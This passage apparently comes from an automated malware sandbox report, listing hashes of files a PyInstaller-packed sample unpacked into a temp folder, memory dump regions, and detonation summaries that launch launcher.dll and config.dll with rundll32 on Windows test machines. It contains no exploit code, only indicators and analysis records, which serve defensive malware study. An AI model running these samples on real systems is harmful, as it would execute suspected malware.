SHA512 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

C:\Users\Admin\AppData\Local\Temp\_MEI13842\select.pyd

MD5 5c66bcf3cc3c364ecac7cf40ad28d8f0
SHA1 faf0848c231bf120dc9f749f726c807874d9d612
SHA256 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc
SHA512 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

C:\Users\Admin\AppData\Local\Temp\_MEI13842\libcrypto-1_1.dll

MD5 e5aecaf59c67d6dd7c7979dfb49ed3b0
SHA1 b0a292065e1b3875f015277b90d183b875451450
SHA256 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1
SHA512 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

C:\Users\Admin\AppData\Local\Temp\_MEI13842\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

C:\Users\Admin\AppData\Local\Temp\_MEI13842\base_library.zip

MD5 c4989bceb9e7e83078812c9532baeea7
SHA1 aafb66ebdb5edc327d7cb6632eb80742be1ad2eb
SHA256 a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd
SHA512 fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671

memory/4652-81-0x00007FFFA84D0000-0x00007FFFA8936000-memory.dmp

memory/3340-86-0x0000000005030000-0x000000000504E000-memory.dmp

memory/3340-87-0x0000000006380000-0x00000000063CC000-memory.dmp

memory/2788-109-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/868-110-0x0000000003800000-0x0000000003C00000-memory.dmp

memory/2788-126-0x00007FFFBF400000-0x00007FFFBF40F000-memory.dmp

memory/868-135-0x0000000000610000-0x000000000067D000-memory.dmp

memory/3340-136-0x0000000073B20000-0x00000000742D0000-memory.dmp

memory/2788-137-0x00007FFFBF220000-0x00007FFFBF22D000-memory.dmp

memory/3340-139-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/3340-141-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/868-142-0x00000000768F0000-0x0000000076B05000-memory.dmp

memory/868-143-0x0000000003800000-0x0000000003C00000-memory.dmp

memory/1372-144-0x00000000003E0000-0x00000000003E9000-memory.dmp

memory/868-138-0x00007FFFC92D0000-0x00007FFFC94C5000-memory.dmp

memory/1372-146-0x0000000002240000-0x0000000002640000-memory.dmp

memory/1372-147-0x0000000002240000-0x0000000002640000-memory.dmp

memory/2788-133-0x00007FFFBB580000-0x00007FFFBB599000-memory.dmp

memory/2788-131-0x00007FFFBBAB0000-0x00007FFFBBAC8000-memory.dmp

memory/2788-130-0x00007FFFBBA80000-0x00007FFFBBAAC000-memory.dmp

memory/3340-149-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/1372-151-0x0000000002240000-0x0000000002640000-memory.dmp

memory/1372-152-0x00000000768F0000-0x0000000076B05000-memory.dmp

memory/1372-148-0x00007FFFC92D0000-0x00007FFFC94C5000-memory.dmp

memory/2788-127-0x00007FFFBBAD0000-0x00007FFFBBAF4000-memory.dmp

memory/868-112-0x0000000003800000-0x0000000003C00000-memory.dmp

memory/868-114-0x0000000003800000-0x0000000003C00000-memory.dmp

memory/1372-153-0x0000000002240000-0x0000000002640000-memory.dmp

memory/3340-154-0x000000007EE90000-0x000000007EEA0000-memory.dmp

memory/3340-155-0x00000000072A0000-0x00000000072D2000-memory.dmp

memory/3340-156-0x0000000074450000-0x000000007449C000-memory.dmp

memory/3340-166-0x00000000068B0000-0x00000000068CE000-memory.dmp

memory/3340-167-0x00000000072E0000-0x0000000007383000-memory.dmp

memory/3340-168-0x0000000007C30000-0x00000000082AA000-memory.dmp

memory/3340-169-0x00000000075F0000-0x000000000760A000-memory.dmp

memory/3340-170-0x0000000007660000-0x000000000766A000-memory.dmp

memory/3340-171-0x0000000007880000-0x0000000007916000-memory.dmp

memory/3340-172-0x00000000077F0000-0x0000000007801000-memory.dmp

memory/3340-173-0x0000000007830000-0x000000000783E000-memory.dmp

memory/3340-174-0x0000000007840000-0x0000000007854000-memory.dmp

memory/3340-175-0x0000000007920000-0x000000000793A000-memory.dmp

memory/3340-176-0x0000000007870000-0x0000000007878000-memory.dmp

memory/3340-180-0x0000000073B20000-0x00000000742D0000-memory.dmp

memory/2788-179-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-181-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-182-0x00007FFFBBAD0000-0x00007FFFBBAF4000-memory.dmp

memory/2788-186-0x00007FFFBB580000-0x00007FFFBB599000-memory.dmp

memory/2788-188-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-195-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-202-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-209-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-216-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-223-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-230-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240226-en

Max time kernel

94s

Max time network

98s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\launcher.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\launcher.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 145.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 152.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 227.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win7-20240221-en

Max time kernel

122s

Max time network

128s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\config.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\config.dll,#1

Network

N/A

Files

N/A